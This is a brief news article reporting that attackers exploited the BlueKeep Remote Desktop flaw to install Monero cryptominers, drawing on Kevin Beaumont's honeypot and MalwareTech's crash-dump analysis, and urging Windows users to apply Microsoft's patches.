Recently one cybersecurity researcher discovered that the vulnerability BlueKeep was back and was used to install cryptominer remotely on compromised machines.
Last June, Microsoft quickly released a patch for Windows XP and Windows 7 to contain the BlueKeep flaw that was used to target code execution on machines running Windows Remote Desktop Services (RDP). At the time, even the NSA was concerned about this flaw that could "be exploited to conduct denial of service attacks."
A security researcher, Kevin Beaumont, found through a honeypot (EternalPot RDP) that the flaw was still active. But in this case it was not used to deploy a DDoS attack, but only for the purpose of installing cryptomers on compromised machines through port 3389 which is specific to remote connections via RDP. Once again the cryptocurrency that was mined was the Monero (XMR), highly prized by hackers.
TWO ENCRYPTED POWERSHELL COMMANDS TO INSTALL THE CRYPTOMINER
The first details about this use of BlueKeep came from the blogger MalwareTech who investigated the "crash dumps" machines described by Kevin Beaumont. He declares in a tweet "It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner."
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr— MalwareTech (@MalwareTechBlog) November 2, 2019
According to his analysis, a first payload executes an encrypted PowerShell command, which downloads a second encrypted PowerShell script. The final payload has the function of installing a cryptominer dedicated to Monero (XMR). This cryptominer is detected by 25 of the 68 antivirus engines provided by the platform. Futhermore, we written a complete tutorial about how hackers exploit BlueKeep vulnerability.
MalwareTech indicates that this attack is not consecutive to a worm, but that it massively uses the BlueKeep flaw. Basically this means that cybercriminals scan the net to find vulnerable systems and install them cryptocurrency miner.
It is therefore urgent to apply patches released by Microsoft. Last July, up to 800.000 systems were vulnerable according to BitSight.